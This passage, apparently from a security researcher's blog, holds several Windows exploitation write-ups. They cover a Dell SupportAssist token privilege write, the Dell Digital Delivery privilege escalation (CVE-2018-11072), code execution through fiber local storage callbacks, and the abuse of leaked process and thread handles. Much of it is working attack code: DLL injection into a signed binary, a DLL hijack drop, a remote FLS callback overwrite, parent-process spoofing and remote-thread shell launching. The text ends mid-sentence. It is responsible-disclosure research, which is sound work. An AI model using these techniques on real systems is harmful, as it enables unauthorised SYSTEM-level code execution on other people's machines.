PXE at FFFFF6FB7DBEDF88    PPE at FFFFF6FB7DBF1400    PDE at FFFFF6FB7E280070    PTE at FFFFF6FC5000E610
contains 000000007AC84863  contains 00000000030D4863  contains 0000000073147863  contains E6500000716FD963
pfn 7ac84     ---DA--KWEV  pfn 30d4      ---DA--KWEV  pfn 73147     ---DA--KWEV  pfn 716fd     -G-DA--KW-V

kd> ? 716fd * 0x1000 + 060
Evaluate expression: 1903153248 = 00000000`716fd060

So our physical address is 0x716fd060 (if you’d like to read more about converting VA to PA, check out this great Microsoft article[6]). Notice the lower 12 bits remain the same between VA/PA. The search loop then boiled down to the following code:

uStartAddr = uStartAddr + (VirtualAddress & 0xfff);
for (USHORT chunk = 0; chunk < 0xb; ++chunk) {
    lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000);
    for(SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000){
        if (memcmp((char*)lpMemBuf + i, "User32 ", 8) == 0){
            
            if (TokenId <= 0x0)
                FetchTokenId();

            if (*(DWORD*)((char*)lpMemBuf + i + 0x10) == TokenId) {
                hTokenAddr = uStartAddr;
                break;
            }
        }
    }

    HeapFree(GetProcessHeap(), 0, lpMemBuf);

    if (hTokenAddr > 0x0)
        break;
}

Once we identify the PA of our token, we trigger two separate writes at offset 0x40 and offset 0x48, or the Enabled and Default fields of a _TOKEN. This sometimes requires a few runs to get right (due to mapping, which I was too lazy to work out), but is very stable.
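
A sketch of those two writes, assuming a WriteBlockMem counterpart to the ReadBlockMem helper above (hypothetical, wrapping the writePhysicalMemory ioctl 0x222088); see token-priv[5] for the details of the privilege bitmasks:

// SeDebugPrivilege has LUID 20, so flip bit 20 in both fields
SIZE_T privMask = (SIZE_T)1 << 20;

// hypothetical wrapper around ioctl 0x222088 (MemDriver::writePhysicalMemory)
WriteBlockMem(hDriver, hTokenAddr + 0x40, &privMask, sizeof(privMask));
WriteBlockMem(hDriver, hTokenAddr + 0x48, &privMask, sizeof(privMask));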

You can find the source code for the bug here.

Timeline

04/05/18 – Vulnerability reported
04/06/18 – Initial response from Dell
04/10/18 – Status update from Dell
04/18/18 – Status update from Dell
05/16/18 – Patched version released (v2.2)

References

[0] http://www.dell.com/support/contents/us/en/04/article/product-support/self-support-knowledgebase/software-and-downloads/supportassist
[1] http://blog.rewolf.pl/blog/?p=1630
[2] https://www.exploit-db.com/exploits/39785/
[3] http://www.pc-doctor.com/
[4] https://github.com/rwfpl/rewolf-msi-exploit
[5] https://github.com/hatRiot/token-priv
[6] https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/converting-virtual-addresses-to-physical-addresses

Dell Digital Delivery - CVE-2018-11072 - Local Privilege Escalation

22 August 2018 at 21:10

Back in March or April I began reversing a slew of Dell applications installed on a laptop I had. Many of them had privileged services or processes running and seemed to perform a lot of different complex actions. I previously disclosed an LPE in SupportAssist[0], and identified another in their Digital Delivery platform. This post will detail a Digital Delivery vulnerability and how it can be exploited. This was privately discovered and disclosed, and no known active exploits are in the wild. Dell has issued a security advisory for this issue, which can be found here[4].

I’ll have another follow-up post detailing the internals of this application and a few others to provide any future researchers with a starting point. Both applications are rather complex and expose a large attack surface. If you’re interested in bug hunting LPEs in large C#/C++ applications, it’s a fine place to begin.

Dell’s Digital Delivery[1] is a platform for buying and installing system software. It allows users to purchase or manage software packages and reinstall them as necessary. Once again, it comes “..preinstalled on most Dell systems.”[1]

Bug

The Digital Delivery service runs as SYSTEM under the name DeliveryService, which runs the DeliveryService.exe binary. A userland binary, DeliveryTray.exe, is the user-facing component that allows users to view installed applications or reinstall previously purchased ones.

Communication from DeliveryTray to DeliveryService is performed via a Windows Communication Foundation (WCF) named pipe. If you’re unfamiliar with WCF, it’s essentially a standard methodology for exchanging data between two endpoints[2]. It allows a service to register a processing endpoint and expose functionality, similar to a web server with a REST API.

For those following along at home, you can find the initialization of the WCF pipe in Dell.ClientFulfillmentService.Controller.Initialize:

this._host = WcfServiceUtil.StandupServiceHost(typeof(UiWcfSession),
                                typeof(IClientFulfillmentPipeService),
                                "DDDService");

This invokes Dell.NamedPipe.StandupServiceHost:

ServiceHost host = null;
string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";
Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());
Tryblock.Run(delegate
{
  host = new ServiceHost(classType, new Uri[]
  {
    realUri
  });
  host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);
  host.Open();
}, null, null);
AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);

The endpoint is thus registered and listening and the AuthenticationManager singleton is responsible for handling requests. Once a request comes in, the AuthenticationManager passes this off to the AuthPipeWorker function which, among other things, performs the following authentication:

string execuableByProcessId = AuthenticationManager.GetExecuableByProcessId(processId);
bool flag2 = !FileUtils.IsSignedByDell(execuableByProcessId);
if (!flag2)
{
    ...

If the process on the other end of the request is backed by a signed Dell binary, the request is allowed and a connection may be established. If not, the request is denied.

I noticed that this is new behavior, added sometime between 3.1 (my original testing) and 3.5 (latest version at the time, 3.5.1001.0), so I assume Dell is aware of this as a potential attack vector. Unfortunately, this is an inadequate mitigation to sufficiently protect the endpoint. I was able to get around this by simply spawning an executable signed by Dell (DeliveryTray.exe, for example) and injecting code into it. Once code is injected, the WCF API exposed by the privileged service is accessible.
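
A sketch of that bypass: spawn a Dell-signed binary and inject into it with the classic LoadLibraryA technique (the paths here are hypothetical, and the injected DLL would then bootstrap the actual WCF client logic):

STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi;
const char *dllPath = "C:\\Users\\Public\\payload.dll"; // hypothetical payload

// spawn a Dell-signed binary to satisfy the IsSignedByDell check
CreateProcessA("DeliveryTray.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

// vanilla CreateRemoteThread + LoadLibraryA injection
LPVOID lpBuf = VirtualAllocEx(pi.hProcess, NULL, strlen(dllPath) + 1,
                              MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(pi.hProcess, lpBuf, dllPath, strlen(dllPath) + 1, NULL);
CreateRemoteThread(pi.hProcess, NULL, 0,
                   (LPTHREAD_START_ROUTINE)LoadLibraryA, lpBuf, 0, NULL);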

The endpoint service itself is implemented by Dell.NamedPipe, and exposes a dozen or so different functions. Those include:

ArchiveAndResetSettings
EnableEntitlements
EnableEntitlementsAsync
GetAppSetting
PingTrayApp
PollEntitlementService
RebootMachine
ReInstallEntitlement
ResumeAllOperations
SetAppSetting
SetAppState
SetEntitlementList
SetUserDownloadChoice
SetWallpaper
ShowBalloonTip
ShutDownApp
UpdateEntitlementUiState

Digital Delivery calls application install packages “entitlements”, so the references to installation/reinstallation are specific to those packages either available or presently installed.

One of the first functions I investigated was ReInstallEntitlement, which allows one to initiate a reinstallation process of an installed entitlement. This code performs the following:

private static void ReInstallEntitlementThreadStart(object reInstallArgs)
{
    PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs)reInstallArgs;
    PipeServiceClient.TryWcfCall(delegate
    {
        PipeServiceClient._commChannel.ReInstall(ra.EntitlementId, ra.RunAsUser);
    }, string.Concat(new object[]
    {
        "ReInstall ",
        ra.EntitlementId,
        " ",
        ra.RunAsUser.ToString()
    }));
}

This builds the arguments from the request and invokes a WCF call, which is sent to the WCF endpoint. The ReInstallEntitlement call takes two arguments: an entitlement ID and a RunAsUser flag. These are both controlled by the caller.

On the server side, Dell.ClientFulfillmentService.Controller handles implementation of these functions, and OnReInstall handles the entitlement reinstallation process. It does a couple sanity checks, validates the package signature, and hits the InstallationManager to queue the install request. The InstallationManager has a job queue and background thread (WorkingThread) that occasionally polls for new jobs and, when it receives the install job, kicks off InstallSoftware.

Because we’re reinstalling an entitlement, the package is cached to disk and ready to be installed. I’m going to gloss over a few installation steps here because it’s frankly standard and menial.

The installation packages are located in C:\ProgramData\Dell\Digital Delivery\Downloads\Software\ and are first unzipped, followed by an installation of the software. In my case, I was triggering the installation of Dell Data Protection - Security Tools v1.9.1, and if you follow along in procmon, you’ll see it start up an install process:

"C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _
Security Tools v1.9.1\STSetup.exe" -y -gm2 /S /z"\"CIRRUS_INSTALL,
SUPPRESSREBOOT=1\""

The run user for this process is determined by the controllable RunAsUser flag and, if set to False, runs as SYSTEM out of the %ProgramData% directory.

During process launch of the STSetup process, I noticed the following in procmon:

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll

Of interest here is that the parent directory, %ProgramData%\Dell\Digital Delivery\Downloads\Software, is not writable by unprivileged users, but the entitlement package folders, Dell Data Protection - Security Tools in this case, are.

This allows non-privileged users to drop arbitrary files into this directory, granting us a DLL hijacking opportunity.

Exploitation

Exploiting this requires several steps:

  1. Drop a DLL under the appropriate %ProgramData% software package directory
  2. Launch a new process running an executable signed by Dell
  3. Inject C# into this process (which is running unprivileged in userland)
  4. Connect to the WCF named pipe from within the injected process
  5. Trigger ReInstallEntitlement
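
Step 1 is nothing more than a file copy into the writable package directory (path from the procmon output above; the payload name matches one of the DLLs the installer loads, and the source path is hypothetical):

CopyFileA("C:\\Users\\Public\\payload.dll",
          "C:\\ProgramData\\Dell\\Digital Delivery\\Downloads\\Software\\"
          "Dell Data Protection _ Security Tools v1.9.1\\VERSION.dll", FALSE);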

Steps 4 and 5 can be performed using the following:

PipeServiceClient client = new PipeServiceClient();
client.Initialize();

while (PipeServiceClient.AppState == AppState.Initializing)
  System.Threading.Thread.Sleep(1000);

EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];
PipeServiceClient.ReInstallEntitlement(entitle.ID, false);
System.Threading.Thread.Sleep(30000);

PipeServiceClient.CloseConnection();

The classes used above are imported from NamedPipe.dll. Note that we’re simply choosing the first entitlement available and reinstalling it. You may need to iterate over entitlements to identify the correct package pointing to where you dropped your DLL.

I’ve provided a PoC on my Github here[3], and Dell has additionally released a security advisory, which can be found here[4].

Timeline

05/24/18 – Vulnerability initially reported
05/30/18 – Dell requests further information
06/26/18 – Dell provides update on review and remediation
07/06/18 – Dell provides internal tracking ID and update on progress
07/24/18 – Update request
07/30/18 – Dell confirms they will issue a security advisory and associated CVE
08/07/18 – 90 day disclosure reminder provided
08/10/18 – Dell confirms 8/22 disclosure date alignment
08/22/18 – Public disclosure

References

[0] http://hatriot.github.io/blog/2018/05/17/dell-supportassist-local-privilege-escalation/
[1] https://www.dell.com/learn/us/en/04/flatcontentg/dell-digital-delivery
[2] https://docs.microsoft.com/en-us/dotnet/framework/wcf/whats-wcf
[3] https://github.com/hatRiot/bugs
[4] https://www.dell.com/support/article/us/en/04/SLN313559

Code Execution via Fiber Local Storage

12 August 2019 at 21:10

While working on another research project (post to be released soon, will update here), I stumbled onto a very Hexacorn[0] inspired type of code injection technique that fit my situation perfectly. Instead of tainting the other post with its description and code, I figured I’d release a separate post describing it here.

When I say that it’s Hexacorn inspired, I mean that the bulk of the strategy is similar to everything else you’ve probably seen; we open a handle to the remote process, allocate some memory, and copy our shellcode into it. At this point we simply need to gain control over execution flow; this is where most of Hexacorn’s techniques come in handy. PROPagate via window properties, WordWarping via rich edit controls, DnsQuery via code pointers, etc. Another great example is Windows Notification Facility via user subscription callbacks (at least in modexp’s proof of concept), though this one isn’t Hexacorn’s.

These strategies are also predicated on the process having certain capabilities (DDE, private clipboards, WNF subscriptions), but more importantly, most, if not all, do not work across sessions or integrity levels. This is obvious and expected, and frankly quite a niche requirement, but in my situation, a necessary one.

Fibers

Fibers are “a unit of execution that must be manually scheduled by the application”[1]. They are essentially register and stack states that can be swapped in and out at will, and reflect upon the thread in which they are executing. A single thread can be running at most a single fiber at a time, but fibers can be hot swapped during execution, and their quantum is user controlled.

Fibers can also create and use fiber data. A pointer to this is stored in TEB->NtTib.FiberData and is a per-thread structure. This is initially set during a call to ConvertThreadToFiber. Taking a quick look at this:

void TestFiber()
{
    PVOID lpFiberData = HeapAlloc(GetProcessHeap(), 0, 0x10);
    PVOID lpFirstFiber = NULL;
    memset(lpFiberData, 0x41, 0x10);

    lpFirstFiber = ConvertThreadToFiber(lpFiberData);
    DebugBreak();
}

int main()
{
    DWORD tid = 0;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TestFiber, 0, 0, &tid);
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

We need to spawn off the test in a new thread, as the main thread will always have a fiber instantiated and the call will fail. If we run this in a debugger we can inspect the data after the break:

0:000> ~
.  0  Id: 1674.1160 Suspend: 1 Teb: 7ffde000 Unfrozen
#  1  Id: 1674.c78 Suspend: 1 Teb: 7ffdd000 Unfrozen
0:000> dt _NT_TIB 7ffdd000 FiberData
ucrtbased!_NT_TIB
   +0x010 FiberData : 0x002ea9c0 Void
0:000> dd poi(0x002ea9c0) l5
002ea998  41414141 41414141 41414141 41414141
002ea9a8  abababab

In addition to fiber data, fibers also have access to the fiber local storage (FLS). For all intents and purposes, this is identical to thread local storage (TLS)[2]. This allows all thread fibers access to shared data via a global index. The API for this is pretty simple, and very similar to TLS. In the following sample, we’ll allocate an index and toss some values in it. Using our previous example as base:

lpFirstFiber = ConvertThreadToFiber(lpFiberData);
dwIdx = FlsAlloc(NULL);
FlsSetValue(dwIdx, lpFiberData);
DebugBreak();

A pointer to this data is stored in the thread’s TEB, and can be extracted from TEB->FlsData. From the above example, assume the returned FLS index for this data is 6:

0:001> ~
   0  Id: 15f0.a10 Suspend: 1 Teb: 7ffdf000 Unfrozen
.  1  Id: 15f0.c30 Suspend: 1 Teb: 7ffde000 Unfrozen
0:001> dt _TEB 7ffde000 FlsData
ntdll!_TEB
   +0xfb4 FlsData : 0x0049a008 Void
0:001> dd poi(0x0049a008+(4*8))
0049a998  41414141 41414141 41414141 41414141
0049a9a8  abababab

Note that the offset is always the index + 2.
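
To make that concrete, reading a slot manually out of the buffer looks something like this (a sketch; x86 offsets from the debugger output above):

// TEB->FlsData is at 0xfb4 on x86; the slot itself sits at index + 2
PVOID *FlsData = *(PVOID **)((BYTE *)NtCurrentTeb() + 0xfb4);
PVOID slotValue = FlsData[dwIdx + 2];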

Abusing FLS Callbacks to Obtain Execution Control

Let’s return to that FlsAlloc call from the above example. Its first parameter is a PFLS_CALLBACK_FUNCTION[3] and is used for, according to MSDN:

An application-defined function. If the FLS slot is in use, FlsCallback is
called on fiber deletion, thread exit, and when an FLS index is freed. Specify
this function when calling the FlsAlloc function. The PFLS_CALLBACK_FUNCTION
type defines a pointer to this callback function. 

Well isn’t that lovely. These callbacks are stored process wide in PEB->FlsCallback. Let’s try it out:

dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);

And fetching it (assuming again an index of 6):

0:001> dt _PEB 7ffd8000 FlsCallback
ucrtbased!_PEB
   +0x20c FlsCallback : 0x002d51f8 _FLS_CALLBACK_INFO
0:001> dd 0x002d51f8 + (2 * 6 * 4) l1
002d5228  41414141

What happens when we let this run to process exit?

0:001> g
(10a8.1328): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd8000 ecx=002da998 edx=002d522c esi=00000006 edi=002da028
eip=41414141 esp=0051f71c ebp=0051f734 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???

Recall the MSDN comment about when the FLS callback is invoked: ..on fiber deletion, thread exit, and when an FLS index is freed. This means that worst case our code executes once the process exits, and best case following a thread’s exit or a call to FlsFree. It’s worth reiterating that the primary thread for each process will have a fiber instantiated already; it’s quite possible that this thread isn’t around anymore, but this doesn’t matter as the callbacks are at the process level.
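
This also means we don’t have to wait for process exit when testing locally; freeing the index fires the callback immediately (a quick sketch):

dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);
FlsSetValue(dwIdx, lpFiberData);
FlsFree(dwIdx); // callback invoked here instead of at process exit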

Another salient point here is the first parameter to the callback function. This parameter is the value of whatever was in the indexed slot and is also stashed in ECX/RCX before invoking the callback:

dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);
FlsSetValue(dwIdx, (PVOID)0x42424242);
DebugBreak();

Which, when executed:

(aa8.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd9000 ecx=42424242 edx=003c522c esi=00000006 edi=003ca028
eip=41414141 esp=006ef9c0 ebp=006ef9d8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
41414141 ??              ???

Under specific circumstances, this can be quite useful.

Anyway, PoC||GTFO, I’ve included some code below. In it, we overwrite the msvcrt!_freefls call used to free the FLS buffer.

#ifdef _WIN64
#define FlsCallbackOffset 0x320
#else
#define FlsCallbackOffset 0x20c
#endif

void OverwriteFlsCallback(LPVOID dwNewAddr, HANDLE hProcess) 
{
    _NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"), 
                                                            "NtQueryInformationProcess");
    const char *payload = "\xcc\xcc\xcc\xcc";
    PROCESS_BASIC_INFORMATION pbi;
    SIZE_T sCallback = 0, sRetLen = 0;
    LPVOID lpBuf = NULL;

    //
    // allocate memory and write in our payload as one would normally do
    //

    lpBuf = VirtualAllocEx(hProcess, NULL, sizeof(SIZE_T), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, lpBuf, payload, sizeof(SIZE_T), NULL);

    // now we need to fetch the remote process PEB
    NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi,
                              sizeof(PROCESS_BASIC_INFORMATION), NULL);

    // read the FlsCallback address out of it
    ReadProcessMemory(hProcess, (LPVOID)(((SIZE_T)pbi.PebBaseAddress) + FlsCallbackOffset), 
                          (LPVOID)&sCallback, sizeof(SIZE_T), &sRetLen);
    sCallback += 2 * sizeof(SIZE_T);

    // we're targeting the _freefls call, so overwrite that with our payload
    // address 
    WriteProcessMemory(hProcess, (LPVOID)sCallback, &dwNewAddr, sizeof(SIZE_T), &sRetLen);
}

I tested this on an updated Windows 10 x64 against notepad and mspaint; on process exit, the callback is executed and we gain control over execution flow. Pretty useful in the end; more on this soon…

References

[0] http://www.hexacorn.com
[1] https://docs.microsoft.com/en-us/windows/win32/procthread/fibers
[2] https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage
[3] https://docs.microsoft.com/en-us/windows/win32/api/winnt/nc-winnt-pfls_callback_function

Exploiting Leaked Process and Thread Handles

22 August 2019 at 21:10

Over the years I’ve seen and exploited the occasional leaked handle bug. These can be particularly fun to toy with, as the handles aren’t always granted PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity. This post will address the various access rights assignable to handles and what we can do to exploit them to gain elevated code execution. I’ve chosen to focus specifically on process and thread handles as this seems to be the most common case, but surely other objects can be exploited in a similar manner.

As background, while this bug can occur under various circumstances, I’ve most commonly seen it manifest when some privileged process opens a handle with bInheritHandle set to true. Once this happens, any child process of this privileged process inherits the handle and all access it grants. As an example, assume a SYSTEM level process does this:

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());

Since it’s allowing the opened handle to be inherited, any child process will gain access to it. If the privileged process spawns userland code impersonating the desktop user, as services often do, those userland processes will have access to that handle.

Existing bugs

There are several public bugs we can point to over the years as examples and inspiration. As per usual, James Forshaw has a fun one from 2016[0] in which he’s able to leak a privileged thread handle out of the secondary logon service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but he exploited it in a novel way that I was unaware of at the time.

Another one from Ivan Fratric exploited[1] a leaked process handle with PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he identifies the JIT server process mapping memory into the content process. To do this, the JIT process needs a handle to it. The content process calls DuplicateHandle on itself with the PROCESS_DUP_HANDLE, which can be exploited to obtain a full access handle.

A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS handle was obtained from a privileged process. They were able to exploit this via a dropped DLL and an APC.

Setup

In this post, I wanted to examine all possible access rights to determine which were exploitable on their own and which were not. Of those that were not, I tried to determine what concoction of privileges was necessary to make it so. I’ve tried to stay “realistic” here based on my experience, but you never know what you’ll find in the wild, and this post reflects that.

For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:

#include "pch.h"
#include <iostream>
#include <Windows.h>

int main(int argc, char **argv)
{
    if (argc <= 1) {
        printf("[-] Please give me a target PID\n");
        return -1;
    }

    HANDLE hUserToken, hUserProcess;
    HANDLE hProcess;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
    if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
        printf("[-] Failed to open user process: %d\n", GetLastError());
        CloseHandle(hUserProcess);
        return -1;
    }

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
    printf("[+] Process: %x\n", hProcess);

    CreateProcessAsUserA(hUserToken, 
        "VulnServiceClient.exe", 
        NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    // suspend ourselves to keep the privileged process (and the leaked
    // handle) alive while the client runs
    SuspendThread(GetCurrentThread());
    return 0;
}

In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.

The client is, of course, a little more involved. The only component that needs a little discussion up front is fetching the leaked handle. This can be done via NtQuerySystemInformation and does not require any special privileges:

void ProcessHandles()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject =
        (_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
    _NtQueryObject NtQueryObject =
        (_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    _RtlEqualUnicodeString RtlEqualUnicodeString =
        (_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
    _RtlInitUnicodeString RtlInitUnicodeString = 
        (_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    ULONG handleInfoSize = 0x10000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    DWORD dwPid = GetCurrentProcessId();


    printf("[+] Looking for process handles...\n");

    while ((status = NtQuerySystemInformation(
        SystemHandleInformation,
        phHandleInfo,
        handleInfoSize,
        NULL
    )) == STATUS_INFO_LENGTH_MISMATCH)
        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);

    if (status != STATUS_SUCCESS)
    {
        printf("NtQuerySystemInformation failed!\n");
        return;
    }

    printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);

    // iterate handles until we find the privileged process
    for (int i = 0; i < phHandleInfo->HandleCount; ++i)
    {
        SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
        POBJECT_TYPE_INFORMATION objectTypeInfo;
        PVOID objectNameInfo;
        UNICODE_STRING objectName;
        ULONG returnLength;

        // Check if this handle belongs to the PID the user specified
        if (handle.ProcessId != dwPid)
            continue;

        objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectTypeInformation,
            objectTypeInfo,
            0x1000,
            NULL
        ) != STATUS_SUCCESS)
            continue;

        if (handle.GrantedAccess == 0x0012019f)
        {
            free(objectTypeInfo);
            continue;
        }

        objectNameInfo = malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectNameInformation,
            objectNameInfo,
            0x1000,
            &returnLength
        ) != STATUS_SUCCESS)
        {
            objectNameInfo = realloc(objectNameInfo, returnLength);
            if (NtQueryObject(
                (HANDLE)handle.Handle,
                ObjectNameInformation,
                objectNameInfo,
                returnLength,
                NULL
            ) != STATUS_SUCCESS)
            {
                free(objectTypeInfo);
                free(objectNameInfo);
                continue;
            }
        }

        // check if we've got a process object; there should only be one, but should we 
        // have multiple, this is where we'd perform the checks
        objectName = *(PUNICODE_STRING)objectNameInfo;
        UNICODE_STRING pProcess, pThread;

        RtlInitUnicodeString(&pThread, L"Thread");
        RtlInitUnicodeString(&pProcess, L"Process");
        if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
            printf("[+] Found process handle (%x)\n", handle.Handle);
            HANDLE hProcess = (HANDLE)handle.Handle;
        }
        else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
            printf("[+] Found thread handle (%x)\n", handle.Handle);
            HANDLE hThread = (HANDLE)handle.Handle;
        }
        else
            continue;
        
        free(objectTypeInfo);
        free(objectNameInfo);
    }
} 

We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.

The remainder of this post will be broken down into process and thread security access rights.

Process

There are approximately 14 process-specific rights[3]. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.

Right off the bat, we’re going to dismiss the following:

PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE

To be clear, I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.

That leaves the following:

PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE

We’ll run through each of these individually.

PROCESS_ALL_ACCESS

The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:

char payload[] = "\xcc\xcc";
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, 2, NULL);
CreateRemoteThread(hProcess, NULL, 0, lpBuf, 0, 0, NULL);

Nothing to it.

PROCESS_CREATE_PROCESS

This right is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. This will create the new process and inherit its parent’s token, which will hopefully be a SYSTEM token.

Here’s how we do that:

STARTUPINFOEXA sinfo = { sizeof(sinfo) };
PROCESS_INFORMATION pinfo;
LPPROC_THREAD_ATTRIBUTE_LIST ptList = NULL;
SIZE_T bytes;

sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);

UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hPrivProc, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;

CreateProcessA("cmd.exe", (LPSTR)"cmd.exe /c calc.exe", 
        NULL, NULL, TRUE, 
        EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, 
        &sinfo.StartupInfo, &pinfo);

We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!

PROCESS_CREATE_THREAD

Here we’ve got the ability to use CreateRemoteThread, but can’t control any memory in the target process. There are of course ways we can influence memory without direct write access, such as WNF, but we’d still have no way of resolving those addresses. As it turns out, however, we don’t need that control. CreateRemoteThread can be pointed at a function with a single argument, which gives us quite a bit of control. LoadLibraryA and WinExec are both great candidates for executing child processes or loading arbitrary code.

As an example, there’s an ANSI cmd.exe string located in msvcrt.dll at offset 0x503b8. We can pass this as an argument to CreateRemoteThread and trigger a WinExec call to pop a shell:

DWORD dwCmd = (GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x503b8);
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
                        (LPTHREAD_START_ROUTINE)WinExec, 
                        (LPVOID)dwCmd, 
                        0, NULL);

We can do something similar for LoadLibraryA. This of course is predicated on the system path containing a writable directory for our user.
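
A sketch of that variant: we point lpParameter at any ANSI string already present in the remote process that names a DLL we can plant in that writable directory (the offset here is hypothetical, hunted down the same way as the cmd.exe string above):

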